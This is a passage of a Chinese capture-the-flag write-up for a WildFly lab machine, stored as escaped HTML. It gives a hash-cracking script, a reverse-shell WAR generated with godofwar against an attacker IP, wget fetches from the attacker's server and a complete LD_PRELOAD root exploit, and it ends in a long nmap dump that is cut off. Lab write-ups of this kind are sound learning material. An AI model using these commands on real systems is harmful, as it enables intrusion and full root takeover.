find \/ -name mgmt-users.properties 2>\/dev\/null\n# \/opt\/wildfly\/standalone\/configuration\/mgmt-users.properties\n# \/opt\/wildfly\/domain\/configuration\/mgmt-users.properties<\/code><\/pre>\n\n\u8fd9\u91cc\u5982\u679c\u6743\u9650\u5b9e\u5728\u4e0d\u591f\uff0c\u5c31\u5728\/etc<\/code>\u548c\/opt<\/code>\u5206\u522b\u641c\u7d22<\/p>\n<\/blockquote>\n\u76f4\u63a5\u8bfb\u53d6\uff1a<\/p>\n
<\/wildfly\/domain\/configuration\/mgmt-users.properties\n#\n# Properties declaration of users for the realm 'ManagementRealm' which is the default realm\n# for new installations. Further authentication mechanism can be configured\n# as part of the <management \/> in host.xml.\n#\n# Users can be added to this properties file at any time, updates after the server has started\n# will be automatically detected.\n#\n# By default the properties realm expects the entries to be in the format: -\n# username=HEX( MD5( username ':' realm ':' password))\n#\n# A utility script is provided which can be executed from the bin folder to add the users: -\n# - Linux\n# bin\/add-user.sh\n#\n# - Windows\n# bin\\add-user.bat\n#\n#$REALM_NAME=ManagementRealm$ This line is used by the add-user utility to identify the realm name already used in this file.\n#\n# On start-up the server will also automatically add a user $local - this user is specifically\n# for local tools running against this AS installation.\n#\n# The following illustrates how an admin user could be defined, this\n# is for illustration only and does not correspond to a usable password.\n#\nadministrator=3bfa7f34174555fe766d0e0295821742<\/code><\/pre>\nhash\u78b0\u649e\u5f97\u5230\u5bc6\u7801<\/h3>\n
\u7528\u6237\u540d\u548c\u57df\u90fd\u7ed9\u4e86\uff1a<\/p>\n
username administrator\nrealm ManagementRealm<\/code><\/pre>\n\u5c1d\u8bd5\u7f16\u5199\u811a\u672c\uff0c\u5bf9\u8fd9\u4e2a hash \u8fdb\u884c\u78b0\u649e\uff0c\u8001\u6837\u5b50\uff0c\u4f7f\u7528rockyou<\/code>\u4f5c\u4e3a\u5b57\u5178\uff1a<\/p>\nimport hashlib\n\nusername = "administrator"\nrealm = "ManagementRealm"\ntarget_hash = "3bfa7f34174555fe766d0e0295821742"\n\nwith open('rockyou.txt','r', errors = "ignore") as dic:\n for i in dic:\n i = i.strip()\n if hashlib.md5(f"{username}:{realm}:{i}".encode()).hexdigest() == target_hash:\n print("[+] I got it!",i)\n break<\/code><\/pre>\n<\/div><\/p>\nkatarina9<\/code><\/pre>\n\u767b\u5f55\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\n\u4e0a\u4f20war\u9a6c\uff08\u6c83\u5c14\u739b\uff1f\uff09<\/h3>\n
\u627e\u5230\u4e00\u5904\u4e0a\u4f20\u5730\u65b9\uff1a<\/p>\n
<\/div><\/p>\n\u4f3c\u4e4e\u4e0a\u4f20war<\/code>\uff0c\u76f4\u63a5\u4f7f\u7528\u4e4b\u524d\u7684\u8681\u5251war\u9a6c\uff0c\u53d1\u73b0\u5220\u6389\u4e86\uff0c\u4f7f\u7528\u5de5\u5177\u751f\u6210\u4e00\u4e2a\uff1a<\/p>\ngodofwar -p reverse_shell -H 10.160.220.139 -P 1234 -o wild<\/code><\/pre>\n[ \u2139 ] Creating Directory Structure:\n \u2714 wild\n \u2714 wild\/WEB-INF\n \u2714 wild\/META-INF\n \u2714 wild\/WEB-INF\/web.xml\n \u2714 wild\/META-INF\/MANIFEST.MF\n[ \u2139 ] Setting up payload:\n \u2714 reverse_shell.jsp \u27ff wild.jsp\n \u2714 wild\/wild.jsp\n[ \u2139 ] Cleaning up\n[ \u2714 ] Backdoor wild.war has been created.<\/code><\/pre>\n\u4e0a\u4f20\uff1a<\/p>\n
<\/div><\/p>\n\u8bbf\u95ee\u89e6\u53d1\uff1a<\/p>\n
<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u6269\u5c55shell<\/h3>\npython3 -V\n# Python 3.11.2\npython3 -c 'import pty;pty.spawn("\/bin\/bash")'\n# tod@wild:\/opt\/wildfly\/bin$ <\/code><\/pre>\n\u4fe1\u606f\u641c\u96c6<\/h3>\ntod@wild:\/opt\/wildfly\/bin$ whoami;id\nwhoami;id\ntod\nuid=1002(tod) gid=1002(tod) groups=1002(tod),100(users)\ntod@wild:\/opt\/wildfly\/bin$ sudo -l\nsudo -l\nMatching Defaults entries for tod on wild:\n env_reset, mail_badpass,\n secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin,\n use_pty\n\nUser tod may run the following commands on wild:\n (ALL : ALL) SETENV: NOPASSWD: \/usr\/bin\/info\ntod@wild:\/opt\/wildfly\/bin$ cd \/usr\/bin\ncd \/usr\/bin\ntod@wild:\/usr\/bin$ file info\nfile info\ninfo: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=62cd90c757a2254b5e4ead585f3564d47fa0c86f, for GNU\/Linux 3.2.0, stripped<\/code><\/pre>\n\u4f20\u8fc7\u6765\u770b\u770b\uff1a<\/p>\n
python3 -m http.server 8888\nwget http:\/\/10.161.16.19:8888\/info -O "$env:USERPROFILE\\Desktop\\info"<\/code><\/pre>\n<\/div><\/p>\n\u9006\u5411\u5206\u6790<\/h3>\n
ida64<\/code>\u6253\u5f00\u770b\u4e00\u4e0b\uff0c\u6211\u6ef4\u4e2a\u4e56\u4e56\uff0c1000\u591a\u884c\uff1a<\/p>\n<\/div><\/p>\n\u679c\u65ad\u653e\u5f03\uff0c\u8fd0\u884c\u4e00\u4e0b\u8bd5\u8bd5\uff1a<\/p>\n
.\/info\ninfo: Terminal type '(null)' is not smart enough to run Info<\/code><\/pre>\n\u91cd\u65b0\u56de\u987e\u4e00\u4e0b\uff0c\u53d1\u73b0\u53ef\u4ee5\u8bbe\u7f6e\u73af\u5883\u53d8\u91cf\uff08setenv<\/code>\uff09<\/p>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n
\u5148\u770b\u770b\u73af\u5883\u53d8\u91cf\u4ee5\u53ca\u5176\u4ed6\u7684\u4fe1\u606f\u5427\uff1a<\/p>\n
echo $PATH\nfind \/ -type -writables 2>\/dev\/null<\/code><\/pre>\n\u4f3c\u4e4e\u6ca1\u6709\u5565\u6709\u7528\u7684\u7ebf\u7d22\u3002<\/p>\n
\u52ab\u6301\u94fe\u63a5\u5e93<\/h3>\n
\u5c1d\u8bd5\u67e5\u770b\u4e00\u4e0b\u8fd9\u4e2asetenv<\/code>\u662f\u5426\u53ef\u4ee5\u5229\u7528\uff1ahttps:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation#setenv<\/a><\/p>\n\nLD_PRELOAD<\/strong>\u73af\u5883\u53d8\u91cf\u7528\u4e8e\u6307\u5b9a\u52a0\u8f7d\u7a0b\u5e8f\u5728\u6240\u6709\u5176\u4ed6\u5e93\uff08\u5305\u62ec\u6807\u51c6 C \u5e93 ( libc.so<\/code>)\uff09\u4e4b\u524d\u52a0\u8f7d\u4e00\u4e2a\u6216\u591a\u4e2a\u5171\u4eab\u5e93\uff08.so \u6587\u4ef6\uff09\u3002\u6b64\u8fc7\u7a0b\u79f0\u4e3a\u9884\u52a0\u8f7d\u5e93\u3002<\/p>\n\u4f46\u662f\uff0c\u4e3a\u4e86\u7ef4\u62a4\u7cfb\u7edf\u5b89\u5168\u5e76\u9632\u6b62\u6b64\u529f\u80fd\u88ab\u5229\u7528\uff0c\u7279\u522b\u662f\u5bf9\u4e8esuid\/sgid<\/strong>\u53ef\u6267\u884c\u6587\u4ef6\uff0c\u7cfb\u7edf\u4f1a\u5f3a\u5236\u6267\u884c\u67d0\u4e9b\u6761\u4ef6\uff1a<\/p>\n\n- \u5bf9\u4e8e\u771f\u5b9e\u7528\u6237 ID ( ruid ) \u4e0e\u6709\u6548\u7528\u6237 ID (<\/em> euid<\/em> )\u4e0d\u5339\u914d\u7684\u53ef\u6267\u884c\u6587\u4ef6\uff0c\u52a0\u8f7d\u7a0b\u5e8f\u4f1a\u5ffd\u7565LD_PRELOAD<\/strong>\u3002<\/li>\n
- \u5bf9\u4e8e\u5177\u6709 suid\/sgid \u7684\u53ef\u6267\u884c\u6587\u4ef6\uff0c\u4ec5\u9884\u52a0\u8f7d\u6807\u51c6\u8def\u5f84\u4e2d\u4e5f\u662f suid\/sgid \u7684\u5e93\u3002<\/li>\n<\/ul>\n<\/blockquote>\n
\u521b\u5efa\u6076\u610f\u4ee3\u7801<\/h4>\n#include <stdio.h>\n#include <sys\/types.h>\n#include <stdlib.h>\n\nvoid _init() {\n unsetenv("LD_PRELOAD");\n setgid(0);\n setuid(0);\n system("\/bin\/bash");\n}<\/code><\/pre>\n\u7f16\u8bd1\u5e76\u4f20\u81f3\u9776\u673a\uff1a<\/p>\n
# kali\nvim exp.c\ngcc -fPIC -shared -o exp.so exp.c -nostartfiles\n# exp.c: In function \u2018_init\u2019:\n# exp.c:7:5: warning: implicit declaration of function \u2018setgid\u2019 [-Wimplicit-function-declaration]\n# 7 | setgid(0);\n# | ^~~~~~\n# exp.c:8:5: warning: implicit declaration of function \u2018setuid\u2019 [-Wimplicit-function-declaration]\n# 8 | setuid(0);\n# | ^~~~~~\npython3 -m http.server 8888<\/code><\/pre>\n# tod\ncd \/tmp\nwget http:\/\/10.160.220.139:8888\/exp.so\nsudo LD_PRELOAD=.\/exp.so \/usr\/bin\/info<\/code><\/pre>\n\u62ff\u5230root\uff01<\/p>\n
<\/div><\/p>\nd8592e5a179d4b80e099f4c9a460c6e4<\/code><\/pre>\n\u518d\u56de\u5934\u627e\u4e00\u4e0buserflag\uff1a<\/p>\n
root@wild:~# cd \/home\ncd \/home\nroot@wild:\/home# ls\nls\ntod\nroot@wild:\/home# cd tod;ls -la\ncd tod;ls -la\ntotal 40\ndrwx------ 5 tod tod 4096 Nov 4 14:08 .\ndrwxr-xr-x 3 root root 4096 Oct 13 07:16 ..\n-rw-r--r-- 1 tod tod 220 Oct 12 19:59 .bash_logout\n-rw-r--r-- 1 tod tod 3526 Oct 12 19:59 .bashrc\ndrwx------ 3 tod tod 4096 Nov 1 18:11 .gnupg\ndrwxr-xr-x 12 tod tod 4096 Oct 12 20:00 .oh-my-zsh\n-rw-r--r-- 1 tod tod 807 Oct 12 19:59 .profile\ndrwx------ 2 tod tod 4096 Nov 4 13:51 .ssh\n-rwx------ 1 tod tod 33 Nov 1 19:05 user.txt\n-rw-r--r-- 1 tod tod 3890 Oct 12 19:59 .zshrc\nroot@wild:\/home\/tod# cat user.txt\ncat user.txt\nc1cc7f5179a168ec93095695f20c9e3f<\/code><\/pre>\n\u53c2\u8003blog<\/h2>\n
https:\/\/www.anquanke.com\/post\/id\/202510<\/a><\/p>\n
rustscan -a 10.0.2.14 -- -A -sC -sV<\/code><\/pre>\nOpen 10.0.2.14:22\nOpen 10.0.2.14:80\nOpen 10.0.2.14:8080\nOpen 10.0.2.14:8443\nOpen 10.0.2.14:9990<\/code><\/pre>\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 9.2p1 Debian 2 (protocol 2.0)\n| ssh-hostkey: \n| 256 dd:83:da:cb:45:d3:a8:ea:c6:be:19:03:45:76:43:8c (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOHL4gbzUOgWlMW\/HgWpBe3FlvvdyW1IsS+o1NK\/YbUOoM3iokvdbkFxXdYjyvzkNpvpCXfldEQwS+BIfEmdtwU=\n| 256 e5:5f:7f:25:aa:c0:18:04:c4:46:98:b3:5d:a5:2b:48 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC0o8\/EYPi0jQMqY1zqXqlKfugpCtjg0i5m3bzbyfqxt\n80\/tcp open http syn-ack Apache httpd 2.4.57 ((Debian))\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache\/2.4.57 (Debian)\n|_http-title: burger html5 landing page\n8080\/tcp open http-proxy syn-ack\n| fingerprint-strings: \n| FourOhFourRequest: \n| HTTP\/1.1 404 Not Found\n| Connection: close\n| Content-Length: 74\n| Content-Type: text\/html\n| Date: Fri, 29 Mar 2024 03:43:16 GMT\n| <html><head><title>Error<\/title><\/head><body>404 - Not Found<\/body><\/html>\n| GetRequest: \n| HTTP\/1.1 200 OK\n| Connection: close\n| Last-Modified: Wed, 18 Oct 2023 06:43:38 GMT\n| Content-Length: 1590\n| Content-Type: text\/html\n| Accept-Ranges: bytes\n| Date: Fri, 29 Mar 2024 03:43:16 GMT\n| <!--\n| Copyright The WildFly Authors\n| SPDX-License-Identifier: Apache-2.0\n| <!DOCTYPE html>\n| <html>\n| <head>\n| <!-- proper charset -->\n| <meta http-equiv="content-type" content="text\/html;charset=utf-8" \/>\n| <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" \/>\n| <title>Welcome to WildFly<\/title>\n| <link rel="shortcut icon" href="favicon.ico" type="image\/x-icon">\n| <link rel="StyleSheet" href="wildfly.css" type="text\/css">\n| <\/head>\n| <body>\n| <div class="wrapper">\n| <div class="content">\n| <div class="logo">\n| <img src="wildfly_logo.png" alt="WildFly" border="0" \/>\n| <\/div>\n| <h1>Welcome to WildFly<\/h1>\n| <h3>Your WildFly instance is ru\n| HTTPOptions: \n| HTTP\/1.1 405 Method Not Allowed\n| Allow: GET, HEAD, POST\n| Connection: close\n| Content-Length: 83\n| Content-Type: text\/html\n| Date: Fri, 29 Mar 2024 03:43:16 GMT\n| <html><head><title>Error<\/title><\/head><body>405 - Method Not Allowed<\/body><\/html>\n| RTSPRequest: \n| HTTP\/1.1 400 Bad Request\n| Content-Length: 0\n|_ Connection: close\n|_http-favicon: Unknown favicon MD5: D9C04E84269281A37E8F024578FFD4F3\n|_http-title: Welcome to WildFly\n|_http-open-proxy: Proxy might be redirecting requests\n| http-methods: \n|_ Supported Methods: GET HEAD POST\n8443\/tcp open ssl\/https-alt syn-ack\n| tls-alpn: \n|_ http\/1.1\n|_ssl-date: TLS randomness does not represent time\n| http-methods: \n|_ Supported Methods: GET HEAD POST\n| fingerprint-strings: \n| FourOhFourRequest: \n| HTTP\/1.1 404 Not Found\n| Connection: close\n| Content-Length: 74\n| Content-Type: text\/html\n| Date: Fri, 29 Mar 2024 03:43:23 GMT\n| <html><head><title>Error<\/title><\/head><body>404 - Not Found<\/body><\/html>\n| GetRequest: \n| HTTP\/1.1 200 OK\n| Connection: close\n| Last-Modified: Wed, 18 Oct 2023 06:43:38 GMT\n| Content-Length: 1590\n| Content-Type: text\/html\n| Accept-Ranges: bytes\n| Date: Fri, 29 Mar 2024 03:43:23 GMT\n| <!--\n| Copyright The WildFly Authors\n| SPDX-License-Identifier: Apache-2.0\n| <!DOCTYPE html>\n| <html>\n| <head>\n| <!-- proper charset -->\n| <meta http-equiv="content-type" content="text\/html;charset=utf-8" \/>\n| <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" \/>\n| <title>Welcome to WildFly<\/title>\n| <link rel="shortcut icon" href="favicon.ico" type="image\/x-icon">\n| <link rel="StyleSheet" href="wildfly.css" type="text\/css">\n| <\/head>\n| <body>\n| <div class="wrapper">\n| <div class="content">\n| <div class="logo">\n| <img src="wildfly_logo.png" alt="WildFly" border="0" \/>\n| <\/div>\n| <h1>Welcome to WildFly<\/h1>\n| <h3>Your WildFly instance is ru\n| HTTPOptions: \n| HTTP\/1.1 405 Method Not Allowed\n| Allow: GET, HEAD, POST\n| Connection: close\n| Content-Length: 83\n| Content-Type: text\/html\n| Date: Fri, 29 Mar 2024 03:43:23 GMT\n|_ <html><head><title>Error<\/title><\/head><body>405 - Method Not Allowed<\/body><\/html>\n|_http-favicon: Unknown favicon MD5: D9C04E84269281A37E8F024578FFD4F3\n|_http-title: Welcome to WildFly\n| ssl-cert: Subject: commonName=localhost\n| Issuer: commonName=localhost\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2024-03-29T03:43:16\n| Not valid after: 2034-03-27T03:43:16\n| MD5: 896e:3042:e13c:a048:4a99:6339:e7d0:9feb\n| SHA-1: 3740:baf7:37e4:30b2:4038:4393:e4d9:8569:15e5:1068\n| -----BEGIN CERTIFICATE-----\n| MIICyzCCAbWgAwIBAgIIFjRGS+M00V0wCwYJKoZIhvcNAQELMBQxEjAQBgNVBAMT\n| CWxvY2FsaG9zdDAiGA8yMDI0MDMyOTAzNDMxNloYDzIwMzQwMzI3MDM0MzE2WjAU\n| MRIwEAYDVQQDEwlsb2NhbGhvc3QwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK\n| AoIBAQCsITFeuqOZtIUa4TDf8RABcgCs87lJzejiTASjLZ6Z7CO\/rAdDKWKQFOxF\n| LU+YHemRsul+LhpgzojAhBuLbfxKZS+TWzVjekTQhDpaCISMgkLh5ZmAyNdFDRdH\n| +SRXrOn2IvqWiKpzdVV5yrgpvByoQqsbMyW0SpERwfh2v2hHD25Waql6qz++I7EE\n| H\/ovgIxL36eShHDWBxrXIPZ2HWL0W91GwMhvV53jah25JvpVUYjs1Dx91Ar0otyy\n| fnb1Di4Ytm+UUWa3e6+xoSgf7FSjCwmzL+Mjs9Sl6uXEuJc7BGauREei+J\/yxvI1\n| r19GTzClUI7kefM5uAkuIFGgWznjAgMBAAGjITAfMB0GA1UdDgQWBBS1Sixbvsns\n| ozYrPxef7VwSTs3W6zALBgkqhkiG9w0BAQsDggEBAGW2B+T16gj+L1muXhpIHzR3\n| f6HO7QAheFk6\/zGHkLBiUyhp0XWnwnQ5\/3z0xGABt0Jt6j8dnghIML25WgRtU+3W\n| wIju0O2Sq+GnasY77ayFX9nCMAjPzu4I1mSi6ax\/qfA8raJBpsyb1q9QVnz9aj24\n| 29P80jUvcSCo0E6gue38OTKDQLvmsx+kxTIuDjK9EWKjrSiO7QgXGHMGTyEYasjK\n| Fk2koAu4KdvH48I72jmdGvGmM5k1V+qk0s+wuIijAo2dsnoEKX3HZpCeeZeNRs5g\n| NHt7jJHoS2HnU3OU0wAgEERpCYVLEq59FzxKf2C+J9IDf0R+2MUjHMxWGTJH\/1I=\n|_-----END CERTIFICATE-----\n9990\/tcp open osm-appsrvr? syn-ack\n| fingerprint-strings: \n| FourOhFourRequest: \n| HTTP\/1.1 404 Not Found\n| Connection: close\n| Content-Length: 74\n| Content-Type: text\/html\n| Date: Fri, 29 Mar 2024 03:43:36 GMT\n| <html><head><title>Error<\/title><\/head><body>404 - Not Found<\/body><\/html>\n| GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, WMSRequest: \n| HTTP\/1.1 400 Bad Request\n| Content-Length: 0\n| Connection: close\n| GetRequest: \n| HTTP\/1.1 302 Found\n| Connection: close\n| Location: \/console\/index.html\n| Content-Length: 0\n| Date: Fri, 29 Mar 2024 03:43:16 GMT\n| HTTPOptions: \n| HTTP\/1.1 405 Method Not Allowed\n| Connection: close\n| Content-Length: 83\n| Content-Type: text\/html\n| Date: Fri, 29 Mar 2024 03:43:16 GMT\n|_ <html><head><title>Error<\/title><\/head><body>405 - Method Not Allowed<\/body><\/html>\n3 services unrecognized despite returning data. If you know the service\/version, please submit the following fingerprints at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\n==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============\nSF-Port8080-TCP:V=7.94SVN%I=7%D=3\/28%Time=660638D2%P=x86_64-pc-linux-gnu%r\nSF:(GetRequest,6F4,"HTTP\/1\\.1\\x20200\\x20OK\\r\\nConnection:\\x20close\\r\\nLast\nSF:-Modified:\\x20Wed,\\x2018\\x20Oct\\x202023\\x2006:43:38\\x20GMT\\r\\nContent-L\nSF:ength:\\x201590\\r\\nContent-Type:\\x20text\/html\\r\\nAccept-Ranges:\\x20bytes\nSF:\\r\\nDate:\\x20Fri,\\x2029\\x20Mar\\x202024\\x2003:43:16\\x20GMT\\r\\n\\r\\n<!--\\n\nSF:\\x20\\x20~\\x20Copyright\\x20The\\x20WildFly\\x20Authors\\n\\x20\\x20~\\x20SPDX-\nSF:License-Identifier:\\x20Apache-2\\.0\\n\\x20\\x20-->\\n\\n<!DOCTYPE\\x20html>\\n\nSF:\\n<html>\\n<head>\\n\\x20\\x20\\x20\\x20<!--\\x20proper\\x20charset\\x20-->\\n\\x2\nSF:0\\x20\\x20\\x20<meta\\x20http-equiv=\\"content-type\\"\\x20content=\\"text\/htm\nSF:l;charset=utf-8\\"\\x20\/>\\n\\x20\\x20\\x20\\x20<meta\\x20http-equiv=\\"X-UA-Com\nSF:patible\\"\\x20content=\\"IE=EmulateIE8\\"\\x20\/>\\n\\n\\x20\\x20\\x20\\x20<title>\nSF:Welcome\\x20to\\x20WildFly<\/title>\\n\\x20\\x20\\x20\\x20<link\\x20rel=\\"shortc\nSF:ut\\x20icon\\"\\x20href=\\"favicon\\.ico\\"\\x20type=\\"image\/x-icon\\">\\n\\x20\\x\nSF:20\\x20\\x20<link\\x20rel=\\"StyleSheet\\"\\x20href=\\"wildfly\\.css\\"\\x20type=\nSF:\\"text\/css\\">\\n<\/head>\\n\\n<body>\\n<div\\x20class=\\"wrapper\\">\\n\\x20\\x20\\\nSF:x20\\x20<div\\x20class=\\"content\\">\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20<div\nSF:\\x20class=\\"logo\\">\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x\nSF:20\\x20\\x20\\x20<img\\x20src=\\"wildfly_logo\\.png\\"\\x20alt=\\"WildFly\\"\\x20b\nSF:order=\\"0\\"\\x20\/>\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20<\/div>\\n\\x20\\x20\\x20\nSF:\\x20\\x20\\x20\\x20\\x20<h1>Welcome\\x20to\\x20WildFly<\/h1>\\n\\n\\x20\\x20\\x20\\x\nSF:20\\x20\\x20\\x20\\x20<h3>Your\\x20WildFly\\x20instance\\x20is\\x20ru")%r(HTTPO\nSF:ptions,F3,"HTTP\/1\\.1\\x20405\\x20Method\\x20Not\\x20Allowed\\r\\nAllow:\\x20GE\nSF:T,\\x20HEAD,\\x20POST\\r\\nConnection:\\x20close\\r\\nContent-Length:\\x2083\\r\\\nSF:nContent-Type:\\x20text\/html\\r\\nDate:\\x20Fri,\\x2029\\x20Mar\\x202024\\x2003\nSF::43:16\\x20GMT\\r\\n\\r\\n<html><head><title>Error<\/title><\/head><body>405\\x\nSF:20-\\x20Method\\x20Not\\x20Allowed<\/body><\/html>")%r(RTSPRequest,42,"HTTP\/\nSF:1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Length:\\x200\\r\\nConnection:\\x2\nSF:0close\\r\\n\\r\\n")%r(FourOhFourRequest,C9,"HTTP\/1\\.1\\x20404\\x20Not\\x20Fou\nSF:nd\\r\\nConnection:\\x20close\\r\\nContent-Length:\\x2074\\r\\nContent-Type:\\x2\nSF:0text\/html\\r\\nDate:\\x20Fri,\\x2029\\x20Mar\\x202024\\x2003:43:16\\x20GMT\\r\\n\nSF:\\r\\n<html><head><title>Error<\/title><\/head><body>404\\x20-\\x20Not\\x20Fou\nSF:nd<\/body><\/html>");\n==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============\nSF-Port8443-TCP:V=7.94SVN%T=SSL%I=7%D=3\/28%Time=660638D8%P=x86_64-pc-linux\nSF:-gnu%r(GetRequest,6F4,"HTTP\/1\\.1\\x20200\\x20OK\\r\\nConnection:\\x20close\\r\nSF:\\nLast-Modified:\\x20Wed,\\x2018\\x20Oct\\x202023\\x2006:43:38\\x20GMT\\r\\nCon\nSF:tent-Length:\\x201590\\r\\nContent-Type:\\x20text\/html\\r\\nAccept-Ranges:\\x2\nSF:0bytes\\r\\nDate:\\x20Fri,\\x2029\\x20Mar\\x202024\\x2003:43:23\\x20GMT\\r\\n\\r\\n\nSF:<!--\\n\\x20\\x20~\\x20Copyright\\x20The\\x20WildFly\\x20Authors\\n\\x20\\x20~\\x2\nSF:0SPDX-License-Identifier:\\x20Apache-2\\.0\\n\\x20\\x20-->\\n\\n<!DOCTYPE\\x20h\nSF:tml>\\n\\n<html>\\n<head>\\n\\x20\\x20\\x20\\x20<!--\\x20proper\\x20charset\\x20--\nSF:>\\n\\x20\\x20\\x20\\x20<meta\\x20http-equiv=\\"content-type\\"\\x20content=\\"te\nSF:xt\/html;charset=utf-8\\"\\x20\/>\\n\\x20\\x20\\x20\\x20<meta\\x20http-equiv=\\"X-\nSF:UA-Compatible\\"\\x20content=\\"IE=EmulateIE8\\"\\x20\/>\\n\\n\\x20\\x20\\x20\\x20<\nSF:title>Welcome\\x20to\\x20WildFly<\/title>\\n\\x20\\x20\\x20\\x20<link\\x20rel=\\"\nSF:shortcut\\x20icon\\"\\x20href=\\"favicon\\.ico\\"\\x20type=\\"image\/x-icon\\">\\n\nSF:\\x20\\x20\\x20\\x20<link\\x20rel=\\"StyleSheet\\"\\x20href=\\"wildfly\\.css\\"\\x2\nSF:0type=\\"text\/css\\">\\n<\/head>\\n\\n<body>\\n<div\\x20class=\\"wrapper\\">\\n\\x2\nSF:0\\x20\\x20\\x20<div\\x20class=\\"content\\">\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x\nSF:20<div\\x20class=\\"logo\\">\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\nSF:\\x20\\x20\\x20\\x20\\x20<img\\x20src=\\"wildfly_logo\\.png\\"\\x20alt=\\"WildFly\\\nSF:"\\x20border=\\"0\\"\\x20\/>\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20<\/div>\\n\\x20\\x\nSF:20\\x20\\x20\\x20\\x20\\x20\\x20<h1>Welcome\\x20to\\x20WildFly<\/h1>\\n\\n\\x20\\x20\nSF:\\x20\\x20\\x20\\x20\\x20\\x20<h3>Your\\x20WildFly\\x20instance\\x20is\\x20ru")%r\nSF:(HTTPOptions,F3,"HTTP\/1\\.1\\x20405\\x20Method\\x20Not\\x20Allowed\\r\\nAllow:\nSF:\\x20GET,\\x20HEAD,\\x20POST\\r\\nConnection:\\x20close\\r\\nContent-Length:\\x2\nSF:083\\r\\nContent-Type:\\x20text\/html\\r\\nDate:\\x20Fri,\\x2029\\x20Mar\\x202024\nSF:\\x2003:43:23\\x20GMT\\r\\n\\r\\n<html><head><title>Error<\/title><\/head><body\nSF:>405\\x20-\\x20Method\\x20Not\\x20Allowed<\/body><\/html>")%r(FourOhFourReque\nSF:st,C9,"HTTP\/1\\.1\\x20404\\x20Not\\x20Found\\r\\nConnection:\\x20close\\r\\nCont\nSF:ent-Length:\\x2074\\r\\nContent-Type:\\x20text\/html\\r\\nDate:\\x20Fri,\\x2029\\\nSF:x20Mar\\x202024\\x2003:43:23\\x20GMT\\r\\n\\r\\n<html><head><title>Error<\/titl\nSF:e><\/head><body>404\\x20-\\x20Not\\x20Found<\/body><\/html>");\n==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============\nSF-Port9990-TCP:V=7.94SVN%I=7%D=3\/28%Time=660638D2%P=x86_64-pc-linux-gnu%r\nSF:(GenericLines,42,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Length:\nSF:\\x200\\r\\nConnection:\\x20close\\r\\n\\r\\n")%r(GetRequest,80,"HTTP\/1\\.1\\x203\nSF:02\\x20Found\\r\\nConnection:\\x20close\\r\\nLocation:\\x20\/console\/index\\.htm\nSF:l\\r\\nContent-Length:\\x200\\r\\nDate:\\x20Fri,\\x2029\\x20Mar\\x202024\\x2003:4\nSF:3:16\\x20GMT\\r\\n\\r\\n")%r(HTTPOptions,DB,"HTTP\/1\\.1\\x20405\\x20Method\\x20N\nSF:ot\\x20Allowed\\r\\nConnection:\\x20close\\r\\nContent-Length:\\x2083\\r\\nConte\nSF:nt-Type:\\x20text\/html\\r\\nDate:\\x20Fri,\\x2029\\x20Mar\\x202024\\x2003:43:16\nSF:\\x20GMT\\r\\n\\r\\n<html><head><title>Error<\/title><\/head><body>405\\x20-\\x2\nSF:0Method\\x20Not\\x20Allowed<\/body><\/html>")%r(RTSPRequest,42,"HTTP\/1\\.1\\x\nSF:20400\\x20Bad\\x20Request\\r\\nContent-Length:\\x200\\r\\nConnection:\\x20close\nSF:\\r\\n\\r\\n")%r(Help,42,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Len\nSF:gth:\\x200\\r\\nConnection:\\x20close\\r\\n\\r\\n")%r(SSLSessionReq,42,"HTTP\/1\\\nSF:.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Length:\\x200\\r\\nConnection:\\x20c\nSF:lose\\r\\n\\r\\n")%r(TerminalServerCookie,42,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Re\nSF:quest\\r\\nContent-Length:\\x200\\r\\nConnection:\\x20close\\r\\n\\r\\n")%r(TLSSe\nSF:ssionReq,42,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Length:\\x200\nSF:\\r\\nConnection:\\x20close\\r\\n\\r\\n")%r(Kerberos,42,"HTTP\/1\\.1\\x20400\\x20B\nSF:ad\\x20Request\\r\\nContent-Length:\\x200\\r\\nConnection:\\x20close\\r\\n\\r\\n")\nSF:%r(SMBProgNeg,42,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Length:\nSF:\\x200\\r\\nConnection:\\x20close\\r\\n\\r\\n")%r(FourOhFourRequest,C9,"HTTP\/1\\\nSF:.1\\x20404\\x20Not\\x20Found\\r\\nConnection:\\x20close\\r\\nC